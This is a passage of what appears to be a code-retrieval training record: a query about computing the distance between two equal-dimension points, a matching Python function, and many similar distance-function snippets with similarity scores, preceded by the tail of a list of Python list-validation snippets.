list) -> None:\r\n if not isinstance(items, list):\r\n raise ValueError(f'Expected list, but received {type(items)}')\r\n for item in items:\r\n if isinstance(item, dict):\r\n self.test_dict(dictionary=item)\r\n elif isinstance(item, list):\r\n self.test_list(items=item)", "def list_type(verifield, required):\n if verifield is None: return True\n if not isinstance(verifield, list): return False\n all_of = [value or True for value in verifield if isinstance(value, required) or value is None]\n return not verifield or (all(all_of or [False]) and len(all_of) == len(verifield))", "def is_entry_in_list(entry, a_list):\n for item in a_list:\n if entry['description'] == item['description']:\n return True\n return False", "def isList(x):\n \n return ( type(x) == list ) # True if the type of x is a list", "def list_check(*args, func=None):\n func = func or inspect.stack()[2][3]\n for var in args:\n if not isinstance(var, (list, collections.UserList, collections.abc.MutableSequence)):\n name = type(var).__name__\n raise ListError(\n 'Function {} expected list, {} got instead.'.format(func, name))", "def _list_like(self, value):\n return (not hasattr(value, \"strip\") and\n (hasattr(value, \"__getitem__\") or\n hasattr(value, \"__iter__\")))\n # return is_sequence(value) # use from pandas.core.common import is_sequence", "def list_check(listz):\n isValid = False\n x = 0\n position = ''\n\n #checking if characters contains 023 and extracting them \n\n while (x < len(listz)):\n if(listz.__contains__(0)):\n position = position + str(listz[listz.index(0)])\n if(listz.__contains__(2)):\n position = position + str(listz[listz.index(2)])\n if(listz.__contains__(3)):\n position = position + str(listz[listz.index(3)])\n x = len(listz) + 1\n\n#making sure its the requered sequence\n\n if(position == '023'):\n isValid = True\n x = x + 1\n return isValid", "def is_list(value):\n return isinstance(value, list)", "def in_zip_list(verifield, checklist):\n valid_dims = zip( *checklist )\n return verifield[0] in valid_dims[0] and verifield[1] in valid_dims[1]", "def is_list(self):\n answer = self._call('is_list')\n return answer.yes", "def _check_string_list(obj: Any):\n if not isinstance(obj, list):\n raise TypeError(f\"obj must be a list, got '{type(obj)}'\")\n if len(obj) > 0 and not isinstance(obj[0], str):\n raise TypeError(f\"obj must contain strings, got '{type(obj[0])}'\")", "def _compare_lists(got, expected):\n\n # Validate Types\n if not isinstance(got, types.ListType) 
or not isinstance(expected, types.ListType):\n logger._warn(\"Parameters should be lists\")\n logger._warn(type(got))\n logger._warn(type(expected))\n return False\n\n # Compare size\n if len(got) != len(expected):\n logger._warn(\"Number of items do not match\")\n return False\n\n # Compare values\n for a in got:\n a = a.strip()\n if a not in expected:\n logger._warn(\"'%s' not present in expected list\" % a)\n return False\n\n return True", "def _validate_resource_list(pkt):\n rlist = pkt._required_data.get('ResourceList')\n if rlist is not None:\n if not isinstance(rlist, list):\n raise PacketInvalidData(\"ResourceList must be a list\")\n if len(rlist) != 1:\n raise PacketInvalidData(\"ResourceList must have exactly one element\")\n\n return True", "def a_list(test_val: object, test_col: object, valid_values: object) -> object:\n tv_upper = test_val.upper()\n rc: bool = True\n # noinspection PyTypeChecker\n value_list = [x[test_col] for x in valid_values]\n value_list_upper = [x.upper() for x in value_list]\n if tv_upper not in value_list_upper:\n print(f'{test_val} is invalid. Valid values are {str(value_list)}')\n rc = False\n return rc", "def compare(lst1):\n brackets = list(\"{[()]}\")\n check = []\n for i in range(len(lst1)):\n check.append(lst1[i] in brackets)\n return all(check)", "def _prepare_and_validate_data(self,data_list):\n pos=0\n list_pos=0\n format=\"\"\n length=0\n value=\"\"\n\n #check number of items in data_list is as expected\n if(self.data_lookup.count()['type']!=len(data_list)):\n raise NumItemsError(\"Wrong number of items for the data type\")\n\n #loop over data from data_types.csv and populate\n for index,row in self.data_lookup.iterrows():\n length=int(row['Bytes'])\n\n #obtain format type\n if (row['Format']=='byte'):\n format=int\n elif (row['Format']=='string'):\n format=str\n\n #obtain limits\n try:\n min=int(row['Min'],16)\n max=int(row['Max'],16)\n except:\n min='*'\n max='*'\n\n #check format type\n if (isinstance(data_list[list_pos],format)):\n #correct format type\n if format==str:\n value=data_list[list_pos].encode()\n elif format==int:\n value=data_list[list_pos].to_bytes(length,'little')\n\n #check limits if int type\n if min=='*' or max == '*':\n pass\n elif int(data_list[list_pos]) >= min and int(data_list[list_pos]) <= max:\n pass\n else:\n raise ValueError(\"value\",int(value),\"is out of range, min:\",min,\"max:\",max)\n else:\n raise TypeError(\"Unknown type, can currently only handle string or integer types\")\n #populate data\n for n in range(0,length):\n self.data[pos+n]=value[n]\n pos=pos+length\n list_pos=list_pos+1\n else:\n raise TypeError(\"expected\",format,\"got\",type(data_list[list_pos]),\"at position\",list_pos)\n return True", "def test_list_of_equal_len():\n\n @type_checked\n def _run_test(something:[str, int, bool]):\n assert isinstance(something[0], str)\n assert isinstance(something[1], int)\n assert isinstance(something[2], bool)\n\n _run_test(something=[None, \"12\", 1])", "def test_list_representation(self):\n \n lr = ['- L1\\n- L2\\n- L3',\n 'text\\n- L1\\n- L2\\ntext\\n- L3',\n '* H\\n- L1\\n - L2\\n** H\\n- L3',\n ' - L1\\n - L2\\n - L3',\n '- L1\\n - L2\\n - L3'\n ]\n\n for l in lr:\n self.assertEqual(l, str(parser.parse(l)))", "def in_pairlist(exp, pairlist):\n if pairlist.null():\n return False\n if pairlist.car().atom():\n raise error.LispException(\"a-list or d-list in wrong format\")\n if exp == pairlist.car().car():\n return True\n return in_pairlist(exp, pairlist.cdr())", "def test_listify(string, cast, 
expected):\n assert listify(string, cast) == expected", "def check_unordered_list(line):\n if line[:2] == '* ' or line[:2] == '- ' or line[:2] == '+ ' and len(line) > 2:\n return True, '<ul><li>' + line[2:] + '</li></ul>'\n return False, ''", "def is_list_of_strings(vals):\n try:\n # check if everything is a string\n for val in vals:\n if not isinstance(val, six.string_types):\n return False\n except Exception:\n # vals is not enumerable\n return False\n\n # everything is a string\n return True", "def is_list_like(value):\n if is_iterable(value) and not isinstance(value, six.string_types):\n return True\n\n else:\n return False", "def _list4_validator(_: object, attrib: 'attrs.Attribute[List[Vec]]', value: object) -> None:\n if not isinstance(value, list):\n raise TypeError(attrib.name + ' should be a list!')\n if len(value) != 4:\n raise ValueError(attrib.name + ' must have 4 values!')", "def check_inputs(self, inputs):\n if self.debug:\n print(\"Checking inputs\")\n result = True\n for _input in inputs:\n if \"word_\" in _input and inputs[_input] == \"\":\n result = False\n elif \"idiom_\" in _input and inputs[_input] == \"\":\n if \"list\" not in _input:\n result = False\n return result", "def _check_list(self, input_list, switch_list):\n\n return_list = []\n for vid in input_list:\n if str(vid) in switch_list:\n return_list.append(vid)\n return return_list", "def validateListValue(self, list_name, list_value):\n try:\n con = self.getMetadataDatabaseConnection()\n results = 0\n results = con.cursor().callproc('qiime_assets.validate_list_value', [list_name, list_value, results])\n return results[2]\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), e)\n return False", "def is_valid_label(label: Union[str, List[str]]) -> bool:\n if isinstance(label, list):\n for item in label:\n if not isinstance(item, str):\n return False\n return True\n return isinstance(label, str)", "def _is_list(arg):\n if isinstance(arg, dict):\n return False\n if isinstance(arg, str): # Python 3-only, as str has __iter__\n return False\n return (\n not _has_method(arg, \"strip\")\n and _has_method(arg, \"__getitem__\")\n or _has_method(arg, \"__iter__\")\n )", "def assertInList(value, values, msg):\n\tassert value in values, msg", "def allin(list1, list2):\n for rule1 in list1:\n literals1 = [literal for literal in rule1]\n for rule2 in list2:\n literals2 = [literal for literal in rule2]\n if literals1 != literals2:\n # If there is one rule different, then is not a sublist\n return False\n return True", "def test_list(self):\n parser = parse_args(['-g', '10', '-s', 'bubble', '-l'])\n self.assertTrue(parser.list)\n self.assertEqual(True, parser.list)\n\n parser = parse_args(['-g', '10', '-s', 'bubble'])\n self.assertEqual(False, parser.list)", "def isvect(x):\n return isinstance(x,list) and len(x) == 4 and isgoodnum(x[0]) and isgoodnum(x[1]) and isgoodnum(x[2]) and isgoodnum(x[3])", "def is_mat_list(list_matrices):\n flag = True\n if isinstance(list_matrices, list):\n for matrix in list_matrices:\n if not isinstance(matrix, np.matrix):\n flag = False\n # TODO Check for matrix dimensions?\n else:\n flag = False\n return flag", "def test_list_string():\n assert is_list_of_strings(None) is None\n assert is_list_of_strings('a')\n assert is_list_of_strings(['a']) is None\n assert is_list_of_strings([1])", "def isValidTypeForList(self, *args):\n return _libsbml.MultiListOfReactionsPlugin_isValidTypeForList(self, *args)", "def is_valid_format(format_string): \n # default\n is_valid = 
True\n \n # list of valid formats\n valid_formats = ['hex', 'char', 'schar','uint', 'int', 'double', \n 'ascii', 'long', 'long long', 'float']\n \n # list of formats provided (may be a single format)\n format_list = format_string.split(', ')\n \n # check each item in the provided list\n for item in format_list:\n \n # if it does not match a valid format then it is invalid\n if item not in valid_formats:\n is_valid = False\n # end if\n # end for\n \n return is_valid", "def list_should_contain_sub_list(self,list1,list2,msg=None,values=True):\r\n diffs = ', '.join(unic(item) for item in list2 if item not in list1)\r\n default = 'Folling values were not found form first list:'+ diffs\r\n _verify_condition(diffs == '',default,msg,values)", "def assertValidPlist(self, data):\r\n # Just try the load. If it throws an exception, the test case will fail.\r\n self.serializer.from_plist(data)", "def test_allowed_list(self):\n val = DwcaValidator(yaml.load(self.yaml_allowed_list, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'rightsHolder': 'INBO'}\n self.assertTrue(val.validate(document))\n document = {'rightsHolder': 'ILVO'}\n self.assertFalse(val.validate(document))\n document = {'sex': 'male'}\n self.assertTrue(val.validate(document))\n document = {'sex': 'female'}\n self.assertTrue(val.validate(document))\n document = {'sex': 'Female'}\n self.assertFalse(val.validate(document))\n document = {'age': 'adult'}\n self.assertTrue(val.validate(document))\n document = {'age': 'juvenile'}\n self.assertTrue(val.validate(document))\n document = {'age': 'adult | juvenile'}\n self.assertTrue(val.validate(document))\n document = {'age': 'adult|juvenile'}\n self.assertFalse(val.validate(document))", "def validate_list(validators, data):\n if type(data) is not list:\n return False\n n_validators = len(validators)\n if n_validators == 0:\n return len(data) == 0\n elif n_validators == 1:\n validator = validators[0]\n return all(imap(lambda item: validate_common(validator, item), data))\n elif n_validators > 1:\n raise NotImplementedError(\"You cannot specify more than one validator for list at the moment.\")", "def uniqueCheckString(aList):\r\n check = ','\r\n for v in aList:\r\n if f',{v},' in check:\r\n return True\r\n check = f'{check}{v},'\r\n return False", "def is_valid_date(lst):\n invalid_date = []\n for date in lst:\n try:\n year = int(date[:4])\n month = int(date[5:7])\n day = int(date[8:10])\n except:\n invalid_date.append(date)\n return invalid_date\n day_count_for_month = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n if year%4==0 and (year%100 != 0 or year%400==0):\n day_count_for_month[2] = 29\n valid = (1 <= month <= 12 and 1 <= day <= day_count_for_month[month])\n if not valid: \n invalid_date.append(date)\n return invalid_date", "def check_def(self,data_list):\n\n if type(data_list)!=list:\n data_list=[data_list]\n \n for value in data_list:\n if type(eval('self.'+value))==str:\n print \"failed for\", value\n return 0\n return 1", "def check_correct_numbers(puzzle_size: int, puzzle_list: list) -> None:\n for number in range(puzzle_size * puzzle_size):\n if number not in puzzle_list:\n raise ParsingError(\"Puzzle does not contain expected numbers.\")", "def check(city: str, country: str, list_of_streets: list) -> bool:\n if not isinstance(city, str) or not isinstance(country, str) or not isinstance(list_of_streets, (list, tuple)):\n raise TypeError\n\n a = re.compile('(?:[a-zA-Zа-яА-Я0-9][a-zA-Zа-яА-Я0-9 -]+)')\n if not a.fullmatch(city) or not 
a.fullmatch(country):\n raise ValueError\n for street in list_of_streets:\n if not isinstance(street, str):\n raise TypeError\n if not a.fullmatch(street):\n raise ValueError\n return True", "def indexists(list, *args): # Technically doesn't have to do with the screen, but it is very useful. \n return all([int(arg) < len(list) for arg in args])", "def test_string_list(self):\n \n self.assertListEqual(\n [\n [5, 3, 1],\n [3, 5],\n [20, 13, 0]\n ],\n [\n maps.map_list(['hello', 'why', 'y']),\n maps.map_list(['yes', 'enjoy']),\n maps.map_list(['15236487921068952470', 'commemoration', ''])\n ])" ]
[ "0.7171144", "0.7102635", "0.70879775", "0.7007761", "0.6736717", "0.67267084", "0.6715916", "0.6705785", "0.6677589", "0.66702265", "0.6668745", "0.6659545", "0.6606097", "0.65899694", "0.6580848", "0.6565618", "0.65465", "0.65330225", "0.65142834", "0.65126836", "0.6511854", "0.6466202", "0.6459701", "0.64475846", "0.6414915", "0.64027363", "0.64013183", "0.6395754", "0.6393286", "0.6377765", "0.63475096", "0.63259226", "0.6317885", "0.6315992", "0.63121647", "0.630819", "0.62761754", "0.6271626", "0.6263358", "0.624776", "0.62354636", "0.6233458", "0.6217592", "0.6208877", "0.61886317", "0.61742747", "0.6150474", "0.6144085", "0.6138559", "0.61135906", "0.6099268", "0.608303", "0.6075169", "0.6059304", "0.6039519", "0.60360146", "0.60320294", "0.6029582", "0.60118014", "0.6008514", "0.600366", "0.59871644", "0.5978662", "0.597381", "0.5967144", "0.59648466", "0.5964127", "0.5958442", "0.59557915", "0.595531", "0.5939545", "0.5938277", "0.593524", "0.5933027", "0.5923132", "0.59127015", "0.59044886", "0.5897581", "0.58843195", "0.5877836", "0.58769214", "0.58695364", "0.5839355", "0.58384883", "0.5837516", "0.5832995", "0.5831299", "0.58303", "0.582933", "0.58277994", "0.5823394", "0.5796669", "0.5789193", "0.57832605", "0.5782409", "0.57793933", "0.5763534", "0.5761622", "0.57608646", "0.5760441", "0.575492" ]
0.0
-1
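The record above documents a small numeric-format check written in Python 2 syntax. For readers who want to run it, here is a minimal Python 3 sketch: the WrongTypePointError class below is only a stand-in (the original defines it elsewhere), and the Python 2 print statement is replaced by the print() function; the control flow otherwise follows the record.

import sys


class WrongTypePointError(Exception):
    # Stand-in for the custom exception referenced by the record above.
    def __init__(self, item):
        super().__init__("value {!r} is not a number".format(item))


def check_if_number(values):
    # Validate that every item in `values` can be converted to float.
    # On the first failure, print the error and exit, as in the record.
    for item in values:
        try:
            float(item)
        except ValueError:
            print(WrongTypePointError(item))
            sys.exit(1)


if __name__ == "__main__":
    check_if_number(["1.5", "2", "3.25"])   # passes silently
    # check_if_number(["1.5", "abc"])       # would print the error and exit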
Calculate the distance between two points with same dimensions.
def distance_between(point_one, point_two):
    sum = 0
    for d1, d2 in zip(point_one, point_two):
        sum += math.pow(float(d1) - float(d2), 2)
    return math.sqrt(sum)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def distance(self, point_a, point_b):\n distance = 0.0\n if len(self.dimensions) > 1:\n for a, b, dim in zip(point_a, point_b, self.dimensions):\n distance += dim.distance(a, b)\n\n if len(self.dimensions) == 1:\n distance += self.dimensions[0].distance(point_a[0], point_b[0])\n\n return distance", "def __get_distance(point1: np.ndarray, point2: np.ndarray) -> float:\n return np.sqrt(np.sum(np.square(point1 - point2)))", "def distance(self, point_1=(0, 0), point_2=(0, 0)):\n\t\treturn math.sqrt((point_1[0]-point_2[0])**2+(point_1[1]-point_2[1])**2)", "def distance(a: Point, b: Point) -> float:\n return math.sqrt(math.pow(b.x - a.x, 2) + math.pow(b.y - a.y, 2))", "def calculateDistance(point1, point2, dimension):\n distance=0\n # print 'p1: ' + str(point1) + 'p2: ' + str(point2) + str(dimension)\n for x in range(dimension - 1):\n distance += pow((point1[x] - point2[x]), 2)\n return math.sqrt(distance)", "def distance_to(self, point1, point2):\n delta_x = self.x_points[point1] - self.x_points[point2]\n delta_y = self.y_points[point1] - self.y_points[point2]\n return math.sqrt(delta_x * delta_x + delta_y * delta_y)", "def distance(pt1, pt2):\n\tx1, y1 = pt1\n\tx2, y2 = pt2\n\tx = x2 - x1\n\ty = y2 - y1\n\ts = x**2 + y**2\n\treturn np.sqrt(s)", "def distance(point_1=(0, 0), point_2=(0, 0)):\n return math.sqrt(\n (point_1[0] - point_2[0]) ** 2 +\n (point_1[1] - point_2[1]) ** 2)", "def distance(self, p1, p2):\n return math.sqrt((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)", "def distance(self, x1, x2):\n return np.sum(np.power((x1-x2),2.0))", "def distance_between_points(a: Point, b: Point) -> float:\n return math.sqrt((a.x - b.x)**2 + (a.y - b.y)**2)", "def distance(self,coord_1, coord_2):\n return np.sqrt(np.sum((np.array(coord_1)-np.array(coord_2))**2))", "def getDistanceBetweenTwoPoints(self, one, two):\n dx = one.x - two.x\n dy = one.y - two.y\n return math.sqrt(dx * dx + dy * dy)", "def _get_dist(self, p1, p2): \r\n\r\n distance = np.sqrt(\r\n (p1[0] - p2[0]) ** 2 +\r\n (p1[1] - p2[1]) ** 2 +\r\n (p1[2] - p2[2]) ** 2)\r\n\r\n return distance", "def dist(a: Point, b: Point):\n return (a.x - b.x) ** 2 + (a.y - b.y) ** 2", "def distance_between_points(p1,p2):\n return math.sqrt((p2.x-p1.x)**2+(p2.y-p1.y)**2)", "def calculate_distance(P1, P2):\n if len(P1) != len(P2):\n raise ValueError('Different dimension of given points.')\n\n square_sum = 0\n for i in range(len(P1)):\n square_sum += (P1[i] - P2[i])**2\n\n return square_sum**(1 / 2)", "def get_distance(pt1,pt2):\r\n x1 = pt1[1]\r\n y1 = pt1[0]\r\n x2 = pt2[1]\r\n y2 = pt2[0]\r\n d = np.sqrt((x2-x1)**2 + (y2-y1)**2)\r\n return d", "def get_distance(point_a, point_b):\n \n return np.sqrt(np.sum((point_a - point_b) ** 2, 1))", "def distance(p0, p1):\n return( numpy.sqrt( (p0[0]-p1[0])**2 + \n (p0[1]-p1[1])**2 + \n (p0[2]-p1[2])**2 ) )", "def distance (p1,p2):\n return np.sqrt(np.sum(np.power(p2-p1,2)))", "def distance(self, c1, c2):\r\n x = (c2.x - c1.x) ** 2\r\n y = (c2.y - c1.y) ** 2\r\n d = int(round(math.sqrt(x + y)))\r\n return d", "def distance(p1,p2):\n return ((p1.x - p2.x)**2 + (p1.y - p2.y)**2)**0.5", "def distance(p1, p2):\n return math.hypot(p1.x-p2.x, p1.y-p2.y)", "def distance(coords1, coords2):\n dx = coords1.x - coords2.x\n dy = coords1.y - coords2.y\n return math.sqrt(dx * dx + dy * dy)", "def distance(xy1, xy2):\n x_dist = xy2[0] - xy1[0]\n y_dist = xy2[1] - xy1[1]\n dist = np.sqrt(x_dist ** 2 + y_dist ** 2)\n return dist", "def distance(point1, point2):\n return math.sqrt(math.pow((point1[0] - point2[0]), 2) +\n 
math.pow(point1[1] - point2[1], 2))", "def distance(a, b):\n return math.sqrt((a.x - b.x) ** 2 + (a.y - b.y) ** 2)", "def distance_between_two_points(p1, p2):\n return math.sqrt((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)", "def distance(point1, point2):\n x1, y1 = point1[0], point1[1]\n x2, y2 = point2[0], point2[1]\n\n dx = x1 - x2\n dy = y1 - y2\n\n return math.sqrt(dx * dx + dy * dy)", "def distance(point1, point2):\n x1, y1 = point1[0], point1[1]\n x2, y2 = point2[0], point2[1]\n\n dx = x1 - x2\n dy = y1 - y2\n\n return math.sqrt(dx * dx + dy * dy)", "def distance(self, other):\n xd, yd = self.x-other.x, self.y-other.y\n return math.sqrt(xd**2 + yd**2)", "def distance(a,b):\n return np.sqrt( (x(a)-x(b))**2 + (y(a)-y(b))**2 )", "def distance(x,y):\n return np.sqrt( np.power(np.array(x) - np.array(y), 2).sum() )", "def distance(pt1, pt2):\n return (pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2", "def distance(p1,p2):\n return ((p2.x - p1.x)*2 + (p2.y - p1.y))**0.5", "def dist(self, one, two):\n return np.sqrt((one[0] - two[0]) ** 2 + (one[1] - two[1]) ** 2)", "def getDistance(point1,point2):\n dx = point2[0]-point1[0]\n dy = point2[1]-point1[1]\n return math.sqrt(dy*dy + dx*dx)", "def calculate_distance(p1, p2):\n\n dist = np.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n\n return dist", "def dist(pt1, pt2):\n return np.sqrt((pt2[0]-pt1[0])**2 + (pt2[1]-pt1[1])**2)", "def distance(p1, p2):\n return np.linalg.norm(np.array(p1) - np.array(p2))", "def compute_distance(point_1, point_2):\n x1, y1, x2, y2 = point_1[0], point_1[1], point_2[0], point_2[1]\n distance = np.sqrt((x2-x1)**2 + (y2-y1)**2)\n\n return distance", "def distance(self, other):\n dx = self.x - other.x\n dy = self.y - other.y\n return math.sqrt(dx*dx + dy*dy)", "def distance(self,other):\n return math.sqrt((self.x - other.x)**2 +(self.y - other.y)**2)", "def distance(p1, p2):\n return math.sqrt((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2 + (p1[2]-p2[2])**2)", "def distance(p1, p2):\n\treturn sqrt((p1[1]-p2[1])**2 + (p1[0]-p2[0])**2)", "def distance(p1, p2):\n return math.sqrt((math.pow((p2[0] - p1[0]), 2) + math.pow((p2[1] - p1[1]), 2)))", "def distance_to(self, other):\n if type(other) == GeoPoint:\n other = other.to_cartesian()\n d0 = self.x - other.x\n d1 = self.y - other.y\n d2 = self.z - other.z\n\n return math.sqrt(d0 * d0 + d1 * d1 + d2 * d2)", "def distance_2d(pt1, pt2):\r\n return geometry.gmXyDistance(pt1, pt2)", "def getDistance(point1, point2x, point2y):\n distance = np.sqrt((point2x - point1[0])**2 + (point2y - point1[1])**2)\n return distance", "def get_distance(self, other):\n return math.sqrt((self.x - other[0])**2 + (self.y - other[1])**2)", "def get_distance(point1, point2):\n a = (point1['x'] - point2['x']) ** 2\n b = (point1['y'] - point2['y']) ** 2\n return (a + b) ** (1.0 / 2)", "def distance(point1, point2):\n return ((point1[0] - point2[0])**2 + (point1[1] - point2[1])**2) ** 0.5", "def get_distance_between(self, p1, p2):\n\t\treturn math.sqrt(math.pow((p1.x - p2.x), 2) + math.pow((p1.y - p2.y), 2))", "def _distance(point_a: tuple, point_b: tuple):\n # rgb values\n x1, y1, z1 = point_a\n x2, y2, z2 = point_b\n\n # distances\n dx = x1 - x2\n dy = y1 - y2\n dz = z1 - z2\n\n # final distance\n return sqrt(dx**2 + dy**2 + dz**2)", "def distance(self, other):\n return math.sqrt((self.x - other.x)**2 + (self.y - other.y)**2)", "def distance(p1, p2):\r\n return math.hypot(p1[0] - p2[0], p1[1] - p2[1])", "def get_distance(self, dim):\n p_1, p_2 = self.points\n nb_dim = len(p_1.values)\n\n other_p = 
copy.deepcopy(self.points[0])\n for d in range(nb_dim):\n if d == dim:\n continue\n other_p[d] = p_2[d]\n return p_1.distance(other_p)", "def distance(p1, p2):\n return np.linalg.norm(p2-p1)", "def calculate_point_distance(p1, p2):\n\n return math.sqrt(math.pow(p1[0]-p2[0],2) + math.pow(p1[1]-p2[1],2))", "def distance(p1, p2):\n return sqrt((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)", "def distance(self, other: PointOrIterable = None) -> float:\n return (self.distance_squared(other or Point())) ** 0.5", "def distance(self, other: \"Point\") -> float:\n if not isinstance(other, self.__class__):\n raise TypeError(\"Expected `other` to be an instance of `{}`\"\\\n .format(self.__class__))\n dx = self.x - other.x\n dy = self.y - other.y\n return sqrt((dx ** 2) + (dy ** 2))", "def distance(p1,p2):\n import numpy as np\n x = np.sqrt(sum(np.power(p2-p1,2)))\n return(x)", "def distance(P1, P2):\n return ((P1[0] - P2[0])**2 + (P1[1] - P2[1])**2) ** 0.5", "def distance(pos1, pos2):\n return math.sqrt((pos1[0] - pos2[0])**2. + (pos1[1] - pos2[1])**2.)", "def get_distance(first: Point, second: Point) -> Float:\n\n return sqrt(\n (second.x - first.x) ** 2\n +\n (second.y - first.y) ** 2\n )", "def distance(x1, y1, x2, y2):\n return ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5", "def distance(self, point1, point2):\n\n\t\tprint \"Inside Distance!-----\"\n\t\tdist = math.pow(point1[0] - point2[0], 2) + math.pow(point1[1] - point2[1], 2);\n\t\treturn dist", "def distanceTwoPoints(self,A,B):\n #productive\n # used by addNeedleToScene\n profprint()\n length = ( (A[0]-B[0])**2 + (A[1]-B[1])**2 + (A[2]-B[2])**2 ) ** 0.5\n return length", "def distance_to(self, other):\n dx = other.x - self.x\n dy = other.y - self.y\n return math.sqrt(dx ** 2 + dy ** 2)", "def distance(p1, p2):\n\n return sqrt(((p2[0] - p1[0])**2) + ((p2[1] - p1[1])**2))", "def _get_distance(a, b):\n return np.sqrt(np.sum((a - b) ** 2))", "def getDistance(self, x1, x2, y1, y2):\n return ((x1 - x2)**2 + (y1 - y2)**2)**0.5", "def getDistance(self,p1,p2):\n return sum([(p1[i]-p2[i])**2 for i in range(2)])", "def distance(point0, point1):\n if point0 is None or point1 is None:\n return None\n diff = np.subtract(point0, point1)\n return np.sqrt(diff[0] ** 2 + diff[1] ** 2)", "def pointPointDistance(p1,p2):\n llsq = 0.0 # line length squared\n # faster, only for 2D\n h = p2[0] - p1[0]\n llsq = llsq + (h*h)\n h = p2[1] - p1[1]\n llsq = llsq + (h*h)\n return math.sqrt(llsq)\n\n for i in range(len(p1)): # each dimension, general case\n h = p2[i] - p1[i]\n llsq = llsq + (h*h)\n return math.sqrt(llsq)", "def distance(p_1, p_2):\n return ((p_2[0] - p_1[0]) ** 2 + (p_2[1] - p_1[1]) ** 2 \\\n + (p_2[2] - p_1[2]) ** 2) ** 0.5", "def distance(x1, y1, x2, y2):\n dist = ((x1-x2)**2 + (y1-y2)**2)**0.5\n return dist", "def distance(self, other):\n\n return hypot(self.x - other.x, self.y - other.y)", "def nn_distance(xyz1, xyz2):\n return _op_library.nn_distance(xyz1, xyz2)", "def calc_point_distance(x1, y1, x2, y2):\n\n return math.hypot(x2 - x1, y2 - y1)", "def calc_dist(c1: Coordinates, c2: Coordinates = None) -> float:\n\t\n\t# Get distances for each dimension in a common unit, meters.\n\tlat_dist = (c1.lat - c2.lat) * LAT_RATIO\n\tlong_dist = (c1.lon - c2.lon) * LONG_RATIO\n\treturn math.sqrt(lat_dist**2 + long_dist**2)", "def distance(self,pose1, pose2):\n return math.sqrt((pose1[0] - pose2[0]) ** 2 + (pose1[1] - pose2[1]) ** 2) + 0.001", "def _distance(coord1, coord2):\n xdist = coord1[0] - coord2[0]\n ydist = coord1[1] - coord2[1]\n return sqrt(xdist*xdist + 
ydist*ydist)", "def distance(cls, atom_1, atom_2):\n\t\t\n\t\treturn np.linalg.norm((atom_1-atom_2).atom_loc)", "def calculate_distance(asteroid_1: Asteroid, asteroid_2: Asteroid) -> float:\n dy = asteroid_2.y - asteroid_1.y\n dx = asteroid_2.x - asteroid_1.x\n return math.sqrt(dy * dy + dx * dx)", "def calculate_distance(point1, point2):\n # modify points to be a [x,y,z] numpy array\n np_point_1 = convert_point_type(point1)\n np_point_2 = convert_point_type(point2)\n\n distance = ((np_point_1[0] - np_point_2[0])**2 + (np_point_1[1] - np_point_2[1])**2)**0.5\n\n return distance", "def distance(d1, d2):\n projection_onto_plane = d2 - projection(d1, d2)\n dist = np.linalg.norm(projection_onto_plane)\n\n return dist", "def distance(self, other):\n return float(abs(self.x - other.x) + abs(self.y - other.y))", "def get_distance(x1, y1, x2, y2):\n return math.sqrt((x1 - x2) ** 2 + (y1 * 2.38 - y2 * 2.38) ** 2)", "def distance_point_point(a, b):\n ab = subtract_vectors(b, a)\n return length_vector(ab)", "def euclidean_distance(x1: np.ndarray, x2: np.ndarray) -> float:\n return np.sqrt(np.square(x1 - x2).sum())", "def distance(point_1, point_2, units=1):\n\n distance = (((point_2[0]-point_1[0])*units)**2.0\n + ((point_2[1]-point_1[1])*units)**2.0\n + ((point_2[2]-point_1[2])*units)**2.0)**0.5\n \n return distance", "def dist(pnt1, pnt2):\n return ((pnt2[0] - pnt1[0])**2 + (pnt2[1] - pnt1[1])**2 + (pnt2[2] - pnt1[2])**2)**0.5", "def distance(self, a, b):\n raise NotImplementedError()", "def point_to_point_distance(p1:Point, p2: Point) -> float:\n return round(geopy.distance.distance((p1.y, p1.x), (p2.y, p2.x)).km,2)", "def distance(a, b):\n return (np.sum((a - b)**2))**0.5", "def calculate_distance(self, other):\n return math.sqrt((self.center[0] - other.center[0]) ** 2 + (self.center[1] - other.center[1]) ** 2)", "def getDistance(X1, X2):\n distance = 0 \n length = len(X1)\n for i in range(length):\n distance += (X1[i] - X2[i])**2 # differences of the columns squared\n \n distance = math.sqrt(distance)\n\n return distance", "def dist_points(x,y):\n\n return abs(x[0]-y[0]) + abs(x[1]-y[1])" ]
[ "0.80836755", "0.79572546", "0.77294564", "0.7520677", "0.75188065", "0.75087476", "0.7456917", "0.74458915", "0.74410594", "0.7438067", "0.7431563", "0.74289346", "0.7414903", "0.7412151", "0.7408342", "0.74023426", "0.7388828", "0.73793226", "0.7354223", "0.73516434", "0.7341085", "0.73321843", "0.7331452", "0.7325296", "0.73134154", "0.73122746", "0.7294608", "0.72888505", "0.7281666", "0.72773945", "0.72773945", "0.72707295", "0.72628284", "0.72552073", "0.72493607", "0.7249056", "0.72461355", "0.72275", "0.72257024", "0.72216505", "0.7219577", "0.72171664", "0.72125775", "0.7209189", "0.7183512", "0.71731037", "0.7170826", "0.7157193", "0.714449", "0.7140532", "0.7139583", "0.71288276", "0.71283084", "0.7123573", "0.7120928", "0.71067595", "0.7105097", "0.7095602", "0.7088737", "0.7083018", "0.7079986", "0.7077365", "0.7072321", "0.70719445", "0.70709705", "0.7069592", "0.70612687", "0.70559686", "0.7052649", "0.7039639", "0.7039022", "0.70334315", "0.7033265", "0.7029674", "0.7015537", "0.7011539", "0.7011342", "0.7001549", "0.6997126", "0.69969606", "0.69906396", "0.6987742", "0.69818693", "0.6972531", "0.69720954", "0.6970313", "0.6968658", "0.6966963", "0.6964845", "0.6964351", "0.6964214", "0.6961497", "0.6960939", "0.6957567", "0.69572157", "0.69562685", "0.6955678", "0.69547915", "0.69501215", "0.69379383", "0.69321203" ]
0.0
-1
